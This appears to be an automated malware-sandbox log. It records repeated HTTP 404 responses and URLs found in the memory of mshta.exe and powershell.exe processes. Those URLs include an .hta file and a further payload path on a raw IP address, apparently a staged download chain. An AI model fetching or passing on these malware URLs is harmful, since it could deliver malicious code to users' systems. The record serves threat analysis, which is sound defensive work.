        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:47:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: mshta.exe, 0000000F.00000002.467980452.00000000033D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.00000000033D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/
        Source: mshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415792873.000000000201E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.456631512.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000054D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.456564171.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
        Source: mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...
        Source: mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...al=qui
        Source: mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta;
        Source: mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaC:
        Source: mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaEM
        Source: mshta.exe, 0000000F.00000002.468383911.0000000004710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaLKWWS
        Source: mshta.exe, 0000000F.00000003.461799715.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.0000000000505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaP
        Source: mshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htacepC:
        Source: mshta.exe, 00000004.00000003.415792873.0000000002015000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461896844.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461439438.0000000002DA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htahttp://192.3.176.141/36/
        Source: mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaicial
        Source: mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htau
        Source: powershell.exe, 00000005.00000002.442283646.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthin
        Source: powershell.exe, 00000011.00000002.481877021.000000000283A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
        Source: powershell.exe, 00000005.00000002.445624079.000000001A933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089
        Source: powershell.exe, 00000011.00000002.486368621.000000001AAF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089Q
        Source: powershell.exe, 00000005.00000002.442283646.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFp
        Source: mshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/P
        Source: mshta.exe, 0000000F.00000002.467980452.00000000033D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.00000000033D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/a.li
        Source: mshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/d
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493058741.000000000229F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493058741.000000000233E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: powershell.exe, 00000005.00000002.445947202.000000001C85E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
        Source: powershell.exe, 00000005.00000002.442283646.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000005.00000002.442283646.000000000238B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493058741.000000000229F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
